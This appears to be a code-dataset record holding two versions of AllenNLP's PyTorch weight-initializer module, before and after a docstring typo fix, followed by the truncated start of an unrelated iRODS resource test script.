CombinedText stringlengths 4 3.42M |
|---|
"""
An initializer is just a PyTorch function.
Here we implement a proxy class that allows us
to register them and supply any additional function arguments
(for example, the `mean` and `std` of a normal initializer)
as named arguments to the constructor.
The available initialization functions are
* ["normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.normal_)
* ["uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.uniform_)
* ["constant"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.constant_)
* ["eye"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.eye_)
* ["dirac"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.dirac_)
* ["xavier_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_uniform_)
* ["xavier_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_normal_)
* ["kaiming_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_uniform_)
* ["kaiming_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_normal_)
* ["orthogonal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.orthogonal_)
* ["sparse"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.sparse_)
* ["block_orthogonal"](./initializers.md#block_orthogonal)
* ["uniform_unit_scaling"](./initializers.md#uniform_unit_scaling)
* ["pretrained"](./initializers.md#PretrainedModelInitializer)
"""
import logging
import re
import math
from typing import Callable, List, Tuple, Dict
import itertools
from overrides import overrides
import torch
import torch.nn.init
from allennlp.common import FromParams, Registrable
from allennlp.common.checks import ConfigurationError
logger = logging.getLogger(__name__)
class Initializer(Registrable):
"""
An initializer is really just a bare pytorch function. This class
is a proxy that allows us to implement `Registrable` for those functions.
"""
default_implementation = "normal"
def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
"""
This function is here just to make mypy happy. We expect initialization functions to
follow this API; the builtin pytorch initialization functions follow this just fine, even
though they don't subclass `Initialization`. We're just making it explicit here, so mypy
knows that initializers are callable like this.
"""
raise NotImplementedError
def uniform_unit_scaling(tensor: torch.Tensor, nonlinearity: str = "linear"):
"""
An initaliser which preserves output variance for approximately gaussian
distributed inputs. This boils down to initialising layers using a uniform
distribution in the range `(-sqrt(3/dim[0]) * scale, sqrt(3 / dim[0]) * scale)`, where
`dim[0]` is equal to the input dimension of the parameter and the `scale`
is a constant scaling factor which depends on the non-linearity used.
See `Random Walk Initialisation for Training Very Deep Feedforward Networks
<https://www.semanticscholar.org/paper/Random-Walk-Initialization-for-Training-Very-Deep-Sussillo-Abbott/be9728a0728b6acf7a485225b1e41592176eda0b>`_
for more information.
# Parameters
tensor : `torch.Tensor`, required.
The tensor to initialise.
nonlinearity : `str`, optional (default = "linear")
The non-linearity which is performed after the projection that this
tensor is involved in. This must be the name of a function contained
in the `torch.nn.functional` package.
# Returns
The initialised tensor.
"""
size = 1.0
# Estimate the input size. This won't work perfectly,
# but it covers almost all use cases where this initialiser
# would be expected to be useful, i.e in large linear and
# convolutional layers, as the last dimension will almost
# always be the output size.
for dimension in list(tensor.size())[:-1]:
size *= dimension
activation_scaling = torch.nn.init.calculate_gain(nonlinearity, tensor)
max_value = math.sqrt(3 / size) * activation_scaling
return tensor.data.uniform_(-max_value, max_value)
def block_orthogonal(tensor: torch.Tensor, split_sizes: List[int], gain: float = 1.0) -> None:
"""
An initializer which allows initializing model parameters in "blocks". This is helpful
in the case of recurrent models which use multiple gates applied to linear projections,
which can be computed efficiently if they are concatenated together. However, they are
separate parameters which should be initialized independently.
# Parameters
tensor : `torch.Tensor`, required.
A tensor to initialize.
split_sizes : List[int], required.
A list of length `tensor.ndim()` specifying the size of the
blocks along that particular dimension. E.g. `[10, 20]` would
result in the tensor being split into chunks of size 10 along the
first dimension and 20 along the second.
gain : float, optional (default = 1.0)
The gain (scaling) applied to the orthogonal initialization.
"""
data = tensor.data
sizes = list(tensor.size())
if any(a % b != 0 for a, b in zip(sizes, split_sizes)):
raise ConfigurationError(
"tensor dimensions must be divisible by their respective "
"split_sizes. Found size: {} and split_sizes: {}".format(sizes, split_sizes)
)
indexes = [list(range(0, max_size, split)) for max_size, split in zip(sizes, split_sizes)]
# Iterate over all possible blocks within the tensor.
for block_start_indices in itertools.product(*indexes):
# A list of tuples containing the index to start at for this block
# and the appropriate step size (i.e split_size[i] for dimension i).
index_and_step_tuples = zip(block_start_indices, split_sizes)
# This is a tuple of slices corresponding to:
# tensor[index: index + step_size, ...]. This is
# required because we could have an arbitrary number
# of dimensions. The actual slices we need are the
# start_index: start_index + step for each dimension in the tensor.
block_slice = tuple(
slice(start_index, start_index + step) for start_index, step in index_and_step_tuples
)
data[block_slice] = torch.nn.init.orthogonal_(tensor[block_slice].contiguous(), gain=gain)
def zero(tensor: torch.Tensor) -> None:
return tensor.data.zero_()
def lstm_hidden_bias(tensor: torch.Tensor) -> None:
"""
Initialize the biases of the forget gate to 1, and all other gates to 0,
following Jozefowicz et al., An Empirical Exploration of Recurrent Network Architectures
"""
# gates are (b_hi|b_hf|b_hg|b_ho) of shape (4*hidden_size)
tensor.data.zero_()
hidden_size = tensor.shape[0] // 4
tensor.data[hidden_size : (2 * hidden_size)] = 1.0
class _InitializerWrapper(Initializer):
def __init__(self, init_function: Callable[..., None], **kwargs):
self._init_function = init_function
self._kwargs = kwargs
def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
self._init_function(tensor, **self._kwargs)
def __repr__(self):
return "Init: %s, with params: %s" % (self._init_function, self._kwargs)
@Initializer.register("normal")
class NormalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "normal".
"""
def __init__(self, mean: float = 0.0, std: float = 0.1):
super().__init__(init_function=torch.nn.init.normal_, mean=mean, std=std)
@Initializer.register("orthogonal")
class OrthogonalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "orthogonal".
"""
def __init__(self, gain: float = 1.0):
super().__init__(init_function=torch.nn.init.orthogonal_, gain=gain)
@Initializer.register("uniform")
class UniformInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "uniform".
"""
def __init__(self, a: float = 0.0, b: float = 1.0):
super().__init__(init_function=torch.nn.init.uniform_, a=a, b=b)
@Initializer.register("constant")
class ConstantInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "constant".
"""
def __init__(self, val: float):
super().__init__(init_function=torch.nn.init.constant_, val=val)
@Initializer.register("dirac")
class DiracInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "dirac".
"""
def __init__(self):
super().__init__(init_function=torch.nn.init.dirac_)
@Initializer.register("xavier_uniform")
class XavierUniformInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "xavir_uniform".
"""
def __init__(self, gain: float = 1.0):
super().__init__(init_function=torch.nn.init.xavier_uniform_, gain=gain)
@Initializer.register("xavier_normal")
class XavierNormalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "xavier_normal".
"""
def __init__(self, gain: float = 1.0):
super().__init__(init_function=torch.nn.init.xavier_normal_, gain=gain)
@Initializer.register("kaiming_uniform")
class KaimingUniformInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "kaiming_uniform".
"""
def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
super().__init__(
init_function=torch.nn.init.kaiming_uniform_, a=a, mode=mode, nonlinearity=nonlinearity
)
@Initializer.register("kaiming_normal")
class KaimingNormalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "kaiming_normal".
"""
def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
super().__init__(
init_function=torch.nn.init.kaiming_normal_, a=a, mode=mode, nonlinearity=nonlinearity
)
@Initializer.register("sparse")
class SparseInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "sparse".
"""
def __init__(self, sparsity: float, std: float = 0.01):
super().__init__(init_function=torch.nn.init.sparse_, sparsity=sparsity, std=std)
@Initializer.register("eye")
class EyeInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "eye".
"""
def __init__(self):
super().__init__(init_function=torch.nn.init.eye_)
@Initializer.register("block_orthogonal")
class BlockOrthogonalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "block_orthogonal".
"""
def __init__(self, split_sizes: List[int], gain: float = 1.0):
super().__init__(init_function=block_orthogonal, split_sizes=split_sizes, gain=gain)
@Initializer.register("uniform_unit_scaling")
class UniformUnitScalingInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "uniform_unit_scaling".
"""
def __init__(self, nonlinearity: str = "linear"):
super().__init__(init_function=uniform_unit_scaling, nonlinearity=nonlinearity)
@Initializer.register("zero")
class ZeroInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "zero".
"""
def __init__(self):
super().__init__(init_function=zero)
@Initializer.register("lstm_hidden_bias")
class LstmHiddenBiasInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "lstm_hidden_bias".
"""
def __init__(self):
super().__init__(init_function=lstm_hidden_bias)
@Initializer.register("pretrained")
class PretrainedModelInitializer(Initializer):
"""
An initializer which allows initializing parameters using a pretrained model. The
initializer will load all of the weights from the `weights_file_path` and use the
name of the new parameters to index into the pretrained parameters. Therefore,
by default, the names of the new and pretrained parameters must be the same.
However, this behavior can be overridden using the `parameter_name_overrides`,
which remaps the name of the new parameter to the key which should be used
to index into the pretrained parameters.
The initializer will load all of the weights from the `weights_file_path`
regardless of which parameters will actually be used to initialize the new model.
So, if you need to initialize several parameters using a pretrained model, the most
memory-efficient way to do this is to use one `PretrainedModelInitializer` per
weights file and use a regex to match all of the new parameters which need to be
initialized.
If you are using a configuration file to instantiate this object, the below entry
in the `InitializerApplicator` parameters will initialize `linear_1.weight` and
`linear_2.weight` using a pretrained model. `linear_1.weight` will be initialized
to the pretrained parameters called `linear_1.weight`, but `linear_2.weight` will
be initialized to the pretrained parameters called `linear_3.weight`::
```
["linear_1.weight|linear_2.weight",
{
"type": "pretrained",
"weights_file_path": "best.th",
"parameter_name_overrides": {
"linear_2.weight": "linear_3.weight"
}
}
]
```
To initialize weights for all the parameters from a pretrained model (assuming their names
remain unchanged), use the following instead:
```
[".*",
{
"type": "pretrained",
"weights_file_path": "best.th",
"parameter_name_overrides": {}
}
]
```
Registered as an `Initializer` with name "pretrained".
# Parameters
weights_file_path : `str`, required
The path to the weights file which has the pretrained model parameters.
parameter_name_overrides : `Dict[str, str]`, optional (default = None)
The mapping from the new parameter name to the name which should be used
to index into the pretrained model parameters. If a parameter name is not
specified, the initializer will use the parameter's default name as the key.
"""
def __init__(
self, weights_file_path: str, parameter_name_overrides: Dict[str, str] = None
) -> None:
self.weights: Dict[str, torch.Tensor] = torch.load(weights_file_path)
self.parameter_name_overrides = parameter_name_overrides or {}
@overrides
def __call__(self, tensor: torch.Tensor, parameter_name: str, **kwargs) -> None: # type: ignore
# Select the new parameter name if it's being overridden
if parameter_name in self.parameter_name_overrides:
parameter_name = self.parameter_name_overrides[parameter_name]
# If the size of the source and destination tensors are not the
# same, then we need to raise an error
source_weights = self.weights[parameter_name]
if tensor.data.size() != source_weights.size():
raise ConfigurationError(
"Incompatible sizes found for parameter %s. "
"Found %s and %s" % (parameter_name, tensor.data.size(), source_weights.size())
)
# Copy the parameters from the source to the destination
tensor.data[:] = source_weights[:]
class InitializerApplicator(FromParams):
"""
Applies initializers to the parameters of a Module based on regex matches. Any parameter not
explicitly matching a regex will not be initialized, instead using whatever the default
initialization was in the module's code.
If you are instantiating this object from a config file, an example configuration is as
follows:
```json
{
"regexes": [
["parameter_regex_match1",
{
"type": "normal"
"mean": 0.01
"std": 0.1
}
],
["parameter_regex_match2", "uniform"]
],
"prevent_regexes": ["prevent_init_regex"]
}
```
where the first item in each tuple under the `regexes` parameters is the regex that matches to
parameters, and the second item specifies an `Initializer.` These values can either be strings,
in which case they correspond to the names of initializers, or dictionaries, in which case they
must contain the "type" key, corresponding to the name of an initializer. In addition, they may
contain auxiliary named parameters which will be fed to the initializer itself. To determine
valid auxiliary parameters, please refer to the torch.nn.init documentation.
# Parameters
regexes : `List[Tuple[str, Initializer]]`, optional (default = [])
A list mapping parameter regexes to initializers. We will check each parameter against
each regex in turn, and apply the initializer paired with the first matching regex, if
any. If "prevent" is assigned to any regex, then it will override and prevent the matched
parameters to be initialzed.
prevent_regexes: `List[str]`, optional (default=None)
Any parameter name matching one of these regexes will not be initialized, regardless of
whether it matches one of the regexes passed in the `regexes` parameter.
"""
def __init__(
self, regexes: List[Tuple[str, Initializer]] = None, prevent_regexes: List[str] = None
) -> None:
self._initializers = regexes or []
self._prevent_regex = None
if prevent_regexes:
self._prevent_regex = "(" + ")|(".join(prevent_regexes) + ")"
def __call__(self, module: torch.nn.Module) -> None:
"""
Applies an initializer to all parameters in a module that match one of the regexes we were
given in this object's constructor. Does nothing to parameters that do not match.
# Parameters
module : torch.nn.Module, required.
The Pytorch module to apply the initializers to.
"""
logger.info("Initializing parameters")
unused_regexes = {initializer[0] for initializer in self._initializers}
uninitialized_parameters = set()
# Store which initialisers were applied to which parameters.
for name, parameter in module.named_parameters():
for initializer_regex, initializer in self._initializers:
allow = self._prevent_regex is None or not bool(
re.search(self._prevent_regex, name)
)
if allow and re.search(initializer_regex, name):
logger.info("Initializing %s using %s initializer", name, initializer_regex)
initializer(parameter, parameter_name=name)
unused_regexes.discard(initializer_regex)
break
else: # no break
uninitialized_parameters.add(name)
for regex in unused_regexes:
logger.warning("Did not use initialization regex that was passed: %s", regex)
logger.info(
"Done initializing parameters; the following parameters are using their "
"default initialization from their code"
)
uninitialized_parameter_list = list(uninitialized_parameters)
uninitialized_parameter_list.sort()
for name in uninitialized_parameter_list:
logger.info(" %s", name)
Fix typo in `InitializerApplicator` docstring (#4100)
"""
An initializer is just a PyTorch function.
Here we implement a proxy class that allows us
to register them and supply any additional function arguments
(for example, the `mean` and `std` of a normal initializer)
as named arguments to the constructor.
The available initialization functions are
* ["normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.normal_)
* ["uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.uniform_)
* ["constant"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.constant_)
* ["eye"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.eye_)
* ["dirac"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.dirac_)
* ["xavier_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_uniform_)
* ["xavier_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_normal_)
* ["kaiming_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_uniform_)
* ["kaiming_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_normal_)
* ["orthogonal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.orthogonal_)
* ["sparse"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.sparse_)
* ["block_orthogonal"](./initializers.md#block_orthogonal)
* ["uniform_unit_scaling"](./initializers.md#uniform_unit_scaling)
* ["pretrained"](./initializers.md#PretrainedModelInitializer)
"""
import logging
import re
import math
from typing import Callable, List, Tuple, Dict
import itertools
from overrides import overrides
import torch
import torch.nn.init
from allennlp.common import FromParams, Registrable
from allennlp.common.checks import ConfigurationError
logger = logging.getLogger(__name__)
class Initializer(Registrable):
"""
An initializer is really just a bare pytorch function. This class
is a proxy that allows us to implement `Registrable` for those functions.
"""
default_implementation = "normal"
def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
"""
This function is here just to make mypy happy. We expect initialization functions to
follow this API; the builtin pytorch initialization functions follow this just fine, even
though they don't subclass `Initialization`. We're just making it explicit here, so mypy
knows that initializers are callable like this.
"""
raise NotImplementedError
def uniform_unit_scaling(tensor: torch.Tensor, nonlinearity: str = "linear"):
"""
An initaliser which preserves output variance for approximately gaussian
distributed inputs. This boils down to initialising layers using a uniform
distribution in the range `(-sqrt(3/dim[0]) * scale, sqrt(3 / dim[0]) * scale)`, where
`dim[0]` is equal to the input dimension of the parameter and the `scale`
is a constant scaling factor which depends on the non-linearity used.
See `Random Walk Initialisation for Training Very Deep Feedforward Networks
<https://www.semanticscholar.org/paper/Random-Walk-Initialization-for-Training-Very-Deep-Sussillo-Abbott/be9728a0728b6acf7a485225b1e41592176eda0b>`_
for more information.
# Parameters
tensor : `torch.Tensor`, required.
The tensor to initialise.
nonlinearity : `str`, optional (default = "linear")
The non-linearity which is performed after the projection that this
tensor is involved in. This must be the name of a function contained
in the `torch.nn.functional` package.
# Returns
The initialised tensor.
"""
size = 1.0
# Estimate the input size. This won't work perfectly,
# but it covers almost all use cases where this initialiser
# would be expected to be useful, i.e in large linear and
# convolutional layers, as the last dimension will almost
# always be the output size.
for dimension in list(tensor.size())[:-1]:
size *= dimension
activation_scaling = torch.nn.init.calculate_gain(nonlinearity, tensor)
max_value = math.sqrt(3 / size) * activation_scaling
return tensor.data.uniform_(-max_value, max_value)
def block_orthogonal(tensor: torch.Tensor, split_sizes: List[int], gain: float = 1.0) -> None:
"""
An initializer which allows initializing model parameters in "blocks". This is helpful
in the case of recurrent models which use multiple gates applied to linear projections,
which can be computed efficiently if they are concatenated together. However, they are
separate parameters which should be initialized independently.
# Parameters
tensor : `torch.Tensor`, required.
A tensor to initialize.
split_sizes : List[int], required.
A list of length `tensor.ndim()` specifying the size of the
blocks along that particular dimension. E.g. `[10, 20]` would
result in the tensor being split into chunks of size 10 along the
first dimension and 20 along the second.
gain : float, optional (default = 1.0)
The gain (scaling) applied to the orthogonal initialization.
"""
data = tensor.data
sizes = list(tensor.size())
if any(a % b != 0 for a, b in zip(sizes, split_sizes)):
raise ConfigurationError(
"tensor dimensions must be divisible by their respective "
"split_sizes. Found size: {} and split_sizes: {}".format(sizes, split_sizes)
)
indexes = [list(range(0, max_size, split)) for max_size, split in zip(sizes, split_sizes)]
# Iterate over all possible blocks within the tensor.
for block_start_indices in itertools.product(*indexes):
# A list of tuples containing the index to start at for this block
# and the appropriate step size (i.e split_size[i] for dimension i).
index_and_step_tuples = zip(block_start_indices, split_sizes)
# This is a tuple of slices corresponding to:
# tensor[index: index + step_size, ...]. This is
# required because we could have an arbitrary number
# of dimensions. The actual slices we need are the
# start_index: start_index + step for each dimension in the tensor.
block_slice = tuple(
slice(start_index, start_index + step) for start_index, step in index_and_step_tuples
)
data[block_slice] = torch.nn.init.orthogonal_(tensor[block_slice].contiguous(), gain=gain)
def zero(tensor: torch.Tensor) -> None:
return tensor.data.zero_()
def lstm_hidden_bias(tensor: torch.Tensor) -> None:
"""
Initialize the biases of the forget gate to 1, and all other gates to 0,
following Jozefowicz et al., An Empirical Exploration of Recurrent Network Architectures
"""
# gates are (b_hi|b_hf|b_hg|b_ho) of shape (4*hidden_size)
tensor.data.zero_()
hidden_size = tensor.shape[0] // 4
tensor.data[hidden_size : (2 * hidden_size)] = 1.0
class _InitializerWrapper(Initializer):
def __init__(self, init_function: Callable[..., None], **kwargs):
self._init_function = init_function
self._kwargs = kwargs
def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
self._init_function(tensor, **self._kwargs)
def __repr__(self):
return "Init: %s, with params: %s" % (self._init_function, self._kwargs)
@Initializer.register("normal")
class NormalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "normal".
"""
def __init__(self, mean: float = 0.0, std: float = 0.1):
super().__init__(init_function=torch.nn.init.normal_, mean=mean, std=std)
@Initializer.register("orthogonal")
class OrthogonalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "orthogonal".
"""
def __init__(self, gain: float = 1.0):
super().__init__(init_function=torch.nn.init.orthogonal_, gain=gain)
@Initializer.register("uniform")
class UniformInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "uniform".
"""
def __init__(self, a: float = 0.0, b: float = 1.0):
super().__init__(init_function=torch.nn.init.uniform_, a=a, b=b)
@Initializer.register("constant")
class ConstantInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "constant".
"""
def __init__(self, val: float):
super().__init__(init_function=torch.nn.init.constant_, val=val)
@Initializer.register("dirac")
class DiracInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "dirac".
"""
def __init__(self):
super().__init__(init_function=torch.nn.init.dirac_)
@Initializer.register("xavier_uniform")
class XavierUniformInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "xavir_uniform".
"""
def __init__(self, gain: float = 1.0):
super().__init__(init_function=torch.nn.init.xavier_uniform_, gain=gain)
@Initializer.register("xavier_normal")
class XavierNormalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "xavier_normal".
"""
def __init__(self, gain: float = 1.0):
super().__init__(init_function=torch.nn.init.xavier_normal_, gain=gain)
@Initializer.register("kaiming_uniform")
class KaimingUniformInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "kaiming_uniform".
"""
def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
super().__init__(
init_function=torch.nn.init.kaiming_uniform_, a=a, mode=mode, nonlinearity=nonlinearity
)
@Initializer.register("kaiming_normal")
class KaimingNormalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "kaiming_normal".
"""
def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
super().__init__(
init_function=torch.nn.init.kaiming_normal_, a=a, mode=mode, nonlinearity=nonlinearity
)
@Initializer.register("sparse")
class SparseInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "sparse".
"""
def __init__(self, sparsity: float, std: float = 0.01):
super().__init__(init_function=torch.nn.init.sparse_, sparsity=sparsity, std=std)
@Initializer.register("eye")
class EyeInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "eye".
"""
def __init__(self):
super().__init__(init_function=torch.nn.init.eye_)
@Initializer.register("block_orthogonal")
class BlockOrthogonalInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "block_orthogonal".
"""
def __init__(self, split_sizes: List[int], gain: float = 1.0):
super().__init__(init_function=block_orthogonal, split_sizes=split_sizes, gain=gain)
@Initializer.register("uniform_unit_scaling")
class UniformUnitScalingInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "uniform_unit_scaling".
"""
def __init__(self, nonlinearity: str = "linear"):
super().__init__(init_function=uniform_unit_scaling, nonlinearity=nonlinearity)
@Initializer.register("zero")
class ZeroInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "zero".
"""
def __init__(self):
super().__init__(init_function=zero)
@Initializer.register("lstm_hidden_bias")
class LstmHiddenBiasInitializer(_InitializerWrapper):
"""
Registered as an `Initializer` with name "lstm_hidden_bias".
"""
def __init__(self):
super().__init__(init_function=lstm_hidden_bias)
@Initializer.register("pretrained")
class PretrainedModelInitializer(Initializer):
"""
An initializer which allows initializing parameters using a pretrained model. The
initializer will load all of the weights from the `weights_file_path` and use the
name of the new parameters to index into the pretrained parameters. Therefore,
by default, the names of the new and pretrained parameters must be the same.
However, this behavior can be overridden using the `parameter_name_overrides`,
which remaps the name of the new parameter to the key which should be used
to index into the pretrained parameters.
The initializer will load all of the weights from the `weights_file_path`
regardless of which parameters will actually be used to initialize the new model.
So, if you need to initialize several parameters using a pretrained model, the most
memory-efficient way to do this is to use one `PretrainedModelInitializer` per
weights file and use a regex to match all of the new parameters which need to be
initialized.
If you are using a configuration file to instantiate this object, the below entry
in the `InitializerApplicator` parameters will initialize `linear_1.weight` and
`linear_2.weight` using a pretrained model. `linear_1.weight` will be initialized
to the pretrained parameters called `linear_1.weight`, but `linear_2.weight` will
be initialized to the pretrained parameters called `linear_3.weight`::
```
["linear_1.weight|linear_2.weight",
{
"type": "pretrained",
"weights_file_path": "best.th",
"parameter_name_overrides": {
"linear_2.weight": "linear_3.weight"
}
}
]
```
To initialize weights for all the parameters from a pretrained model (assuming their names
remain unchanged), use the following instead:
```
[".*",
{
"type": "pretrained",
"weights_file_path": "best.th",
"parameter_name_overrides": {}
}
]
```
Registered as an `Initializer` with name "pretrained".
# Parameters
weights_file_path : `str`, required
The path to the weights file which has the pretrained model parameters.
parameter_name_overrides : `Dict[str, str]`, optional (default = None)
The mapping from the new parameter name to the name which should be used
to index into the pretrained model parameters. If a parameter name is not
specified, the initializer will use the parameter's default name as the key.
"""
def __init__(
self, weights_file_path: str, parameter_name_overrides: Dict[str, str] = None
) -> None:
self.weights: Dict[str, torch.Tensor] = torch.load(weights_file_path)
self.parameter_name_overrides = parameter_name_overrides or {}
@overrides
def __call__(self, tensor: torch.Tensor, parameter_name: str, **kwargs) -> None: # type: ignore
# Select the new parameter name if it's being overridden
if parameter_name in self.parameter_name_overrides:
parameter_name = self.parameter_name_overrides[parameter_name]
# If the size of the source and destination tensors are not the
# same, then we need to raise an error
source_weights = self.weights[parameter_name]
if tensor.data.size() != source_weights.size():
raise ConfigurationError(
"Incompatible sizes found for parameter %s. "
"Found %s and %s" % (parameter_name, tensor.data.size(), source_weights.size())
)
# Copy the parameters from the source to the destination
tensor.data[:] = source_weights[:]
class InitializerApplicator(FromParams):
"""
Applies initializers to the parameters of a Module based on regex matches. Any parameter not
explicitly matching a regex will not be initialized, instead using whatever the default
initialization was in the module's code.
If you are instantiating this object from a config file, an example configuration is as
follows:
```json
{
"regexes": [
["parameter_regex_match1",
{
"type": "normal"
"mean": 0.01
"std": 0.1
}
],
["parameter_regex_match2", "uniform"]
],
"prevent_regexes": ["prevent_init_regex"]
}
```
where the first item in each tuple under the `regexes` parameters is the regex that matches to
parameters, and the second item specifies an `Initializer.` These values can either be strings,
in which case they correspond to the names of initializers, or dictionaries, in which case they
must contain the "type" key, corresponding to the name of an initializer. In addition, they may
contain auxiliary named parameters which will be fed to the initializer itself. To determine
valid auxiliary parameters, please refer to the torch.nn.init documentation.
# Parameters
regexes : `List[Tuple[str, Initializer]]`, optional (default = [])
A list mapping parameter regexes to initializers. We will check each parameter against
each regex in turn, and apply the initializer paired with the first matching regex, if
any.
prevent_regexes: `List[str]`, optional (default=None)
Any parameter name matching one of these regexes will not be initialized, regardless of
whether it matches one of the regexes passed in the `regexes` parameter.
"""
def __init__(
self, regexes: List[Tuple[str, Initializer]] = None, prevent_regexes: List[str] = None
) -> None:
self._initializers = regexes or []
self._prevent_regex = None
if prevent_regexes:
self._prevent_regex = "(" + ")|(".join(prevent_regexes) + ")"
def __call__(self, module: torch.nn.Module) -> None:
"""
Applies an initializer to all parameters in a module that match one of the regexes we were
given in this object's constructor. Does nothing to parameters that do not match.
# Parameters
module : torch.nn.Module, required.
The Pytorch module to apply the initializers to.
"""
logger.info("Initializing parameters")
unused_regexes = {initializer[0] for initializer in self._initializers}
uninitialized_parameters = set()
# Store which initializers were applied to which parameters.
for name, parameter in module.named_parameters():
for initializer_regex, initializer in self._initializers:
allow = self._prevent_regex is None or not bool(
re.search(self._prevent_regex, name)
)
if allow and re.search(initializer_regex, name):
logger.info("Initializing %s using %s initializer", name, initializer_regex)
initializer(parameter, parameter_name=name)
unused_regexes.discard(initializer_regex)
break
else: # no break
uninitialized_parameters.add(name)
for regex in unused_regexes:
logger.warning("Did not use initialization regex that was passed: %s", regex)
logger.info(
"Done initializing parameters; the following parameters are using their "
"default initialization from their code"
)
uninitialized_parameter_list = list(uninitialized_parameters)
uninitialized_parameter_list.sort()
for name in uninitialized_parameter_list:
logger.info(" %s", name)
|
import sys
if (sys.version_info >= (2, 7)):
import unittest
else:
import unittest2 as unittest
import pydevtest_common
from pydevtest_common import assertiCmd, assertiCmdFail, interruptiCmd, create_local_testfile, create_local_largefile, get_hostname, RUN_IN_TOPOLOGY, get_irods_top_level_dir, get_irods_config_dir, mod_json_file
import pydevtest_sessions as s
import commands
import os
import shlex
import datetime
import time
import psutil
import base64
import hashlib
class ResourceBase(object):
def __init__(self):
print "in ResourceBase.__init__"
self.testfile = "pydevtest_testfile.txt"
self.testdir = "pydevtest_testdir"
self.testresc = "pydevtest_TestResc"
self.anotherresc = "pydevtest_AnotherResc"
def run_resource_setup(self):
print "run_resource_setup - BEGIN"
# set up resource itself
for i in self.my_test_resource["setup"]:
parameters = shlex.split(i) # preserves quoted substrings
if parameters[0] == "iadmin":
print s.adminsession.runAdminCmd(parameters[0], parameters[1:])
else:
output = commands.getstatusoutput(" ".join(parameters))
print output
# set up test resource
print "run_resource_setup - creating test resources"
output = commands.getstatusoutput("hostname")
hostname = output[1]
s.adminsession.runAdminCmd(
'iadmin', ["mkresc", self.testresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.testresc])
s.adminsession.runAdminCmd(
'iadmin', ["mkresc", self.anotherresc, "unix file system", hostname + ":/tmp/pydevtest_" + self.anotherresc])
# set up test files
print "run_resource_setup - generating local testfile"
f = open(self.testfile, 'wb')
f.write("I AM A TESTFILE -- [" + self.testfile + "]")
f.close()
print "run_resource_setup - adding testfile to grid"
s.adminsession.runCmd('imkdir', [self.testdir])
s.adminsession.runCmd('iput', [self.testfile])
print "run_resource_setup - adding testfile to grid public directory"
s.adminsession.runCmd('icp', [self.testfile, "../../public/"]) # copy of testfile into public
print "run_resource_setup - setting permissions"
# permissions
s.adminsession.runCmd(
'ichmod', ["read", s.users[1]['name'], "../../public/" + self.testfile]) # read for user1
s.adminsession.runCmd(
'ichmod', ["write", s.users[2]['name'], "../../public/" + self.testfile]) # write for user2
# set test group
